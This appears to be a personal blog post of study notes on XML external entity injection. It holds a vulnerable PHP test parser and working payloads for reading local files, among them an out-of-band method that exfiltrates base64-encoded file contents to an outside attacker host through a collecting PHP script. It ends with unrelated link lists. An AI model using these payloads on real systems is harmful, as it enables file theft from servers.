好久没学习技术了  很多东西都忘了  复习一下

测试代码

<?php

$xml = file_get_contents("php://input");

$data = simplexml_load_string($xml);

foreach ($data as $key => $value){

    echo "you  " . $key . "is  " . $value . "<br>";

}

?>

第一种方法

<?xml version="1.0" encoding="utf-8" ?>

<!DOCTYPE a [ <!ENTITY b SYSTEM "file:///D:/123.txt"> ]>

<user>

<test>&b;</test>

</user>

第二种方法

<?xml version="1.0" encoding="utf-8" ?>

<!DOCTYPE a [ <!ENTITY % d SYSTEM "http://host/test.dtd"> %d; ]>

<user>

<test>&b;</test>

</user>

test.dtd内容是
<!ENTITY b SYSTEM "file:///etc/passwd">

第三种方法

<!DOCTYPE a SYSTEM " http://host/test.dtd">

第四种 无回显的情况 提交

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE try[
<!ENTITY % int SYSTEM "http://123.206.229.100:8888//evil.xml">
%int;
%all;
%send;
]>







服务器1.php文件




<?php file_put_contents("1.txt",$_GET['file']); ?>






服务器evil.xml文件






<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///D:/123.txt">

<!ENTITY % all "<!ENTITY % send SYSTEM 'http://xxx.xxx.xxx/1.php?file=%file;'>">




												


											
xml实体注入学习的更多相关文章
	

    
								
  1. 3. XML实体注入漏洞的利用与学习
		
    XML实体注入漏洞的利用与学习 前言 XXE Injection即XML External Entity Injection,也就是XML外部实体注入攻击.漏洞是在对非安全的外部实体数据进行处理时引发 ...
    
		
    2. 
						
  2. XML实体注入漏洞
		
    XML实体注入漏洞 测试代码1: 新建xmlget.php,复制下面代码 <?php $xml=$_GET['xml']; $data = simplexml_load_string($xml) ...
    
		
    3. 
						
  3. 小试XML实体注入攻击
		
    基础知识 XML(Extensible Markup Language)被设计用来传输和存储数据.关于它的语法,本文不准备写太多,只简单介绍一下. XML基本知识 1 2 3 4 5 <?xml ...
    
		
    4. 
						
  4. 2.XML实体注入漏洞攻与防
		
    XML实体注入基础 当允许引用外部实体时,通过构造恶意内容,可导致读取任意文件.执行系统命令.探测内网端口.攻击内网网站等危害. 简单了解XML以后,我们知道要在XML中使用特殊字符,需要使用实体字符 ...
    
		
    5. 
						
  5. Fortify漏洞之XML External Entity Injection(XML实体注入)
		
    继续对Fortify的漏洞进行总结,本篇主要针对  XML External Entity Injection(XML实体注入) 的漏洞进行总结,如下: 1.1.产生原因: XML External  ...
    
		
    6. 
						
  6. 企业安全01-Apache solr XML实体注入漏洞CVE-2017-12629
		
    Apache solr XML 实体注入漏洞CVE-2017-12629 一.简介 Apache Solr 是一个开源的搜索服务器.Solr 使用 Java 语言开发,主要基于 HTTP 和 Apac ...
    
		
    7. 
						
  7. XXE(XML External Entity attack)XML外部实体注入攻击
		
    导语 XXE:XML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击.由于程序在解析输入的XML数据时,解析了攻击者 ...
    
		
    8. 
						
  8. XML外部实体注入 安鸾 Writeup
		
    XML外部实体注入01 XML外部实体注入,简称XXE 网站URL:http://www.whalwl.host:8016/ 提示:flag文件在服务器根目录下,文件名为flag XML用于标记电子文 ...
    
		
    9. 
						
  9. PHP xml 外部实体注入漏洞学习
		
    XML与xxe注入基础知识 1.XMl定义 XML由3个部分构成,它们分别是:文档类型定义(Document Type Definition,DTD),即XML的布局语言:可扩展的样式语言(Exten ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. ionic报错: Failed to load resource
			
    隔了一天,才发现是代码写错了 出错的原因是在ts 文件中使用这样的定义 data: [] = ['高新区', '经开区', '其他园区']; 错误在于这个定义的类型,不能是 [],修改成 any就没有 ...
    
			
    2. 
						
  2. 【CodeForces 730H】Delete Them
			
    BUPT 2017 summer training (for 16) #1E 题意 找到匹配要删除的文件名们但不匹配其它文件名们的表达式.其中?匹配所有字符,其它字符匹配本身. 题解 如果某个位置出现 ...
    
			
    3. 
						
  3. Mysql 操作技巧
			
    复制表结构 + 表数据Mysql> create tables t2 like t1;Mysql> insert into t2 select * from t1; mysql 索引a.A ...
    
			
    4. 
						
  4. 【UOJ#340】【清华集训2017】小 Y 和恐怖的奴隶主(矩阵快速幂,动态规划)
			
    [UOJ#340][清华集训2017]小 Y 和恐怖的奴隶主(矩阵快速幂,动态规划) 题面 UOJ 洛谷 题解 考虑如何暴力\(dp\). 设\(f[i][a][b][c]\)表示当前到了第\(i\) ...
    
			
    5. 
						
  5. 通过Nifi  导入csv文件到HDFS
			
    1. 拖入一个GetHttp 的processor     右健选择 configure  -> properties , 设置 url 和 filename    url : http://s ...
    
			
    6. 
						
  6. [2017-7-27]Android Learning Day5
			
    总结篇! 吭哧吭哧了三天,最近不断研究<第一行代码:第二版>170多页的那个新闻实践项目,虽然也没有用到数据库和一些Web爬虫的知识,新闻数据都是随机生成的字符串...... 但还是很开心 ...
    
			
    7. 
						
  7. luogu4602 混合果汁 (主席树)
			
    按照美味值从大到小排序,对于每个询问,我想二分找到一个前缀来满足条件 那么以单价为下标建主席树,维护区间的最大体积和 以及满足这个最大体积需要的价钱 然后二分答案,再在主席树上二分,找到恰好满足的那个 ...
    
			
    8. 
						
  8. 20165223《JAVA程序设计》第二周学习总结
			
    20165223 <JAVA程序设计>第二周学习总结 教材学习内容总结 第二章要点 标识符与关键字 基本数据类型 类型转换运算 输入输出数据 数组 第三章要点 运算符与表达式 语句概述 i ...
    
			
    9. 
						
  9. 构造器引用和直接用new创建对象区别
			
    万事用事实说话 package cn.lonecloud; /** * @author lonecloud * @version v1.0 * @date 上午11:22 2018/4/30 */ p ...
    
			
    10. 
						
  10. ElasticSearch启动错误处理方法
			
    在配置完elasticsearch,启动程序会包如下错误: [elk@localhost bin]$ ./elasticsearch ... ... ERROR: [3] bootstrap chec ...
    
			
    11.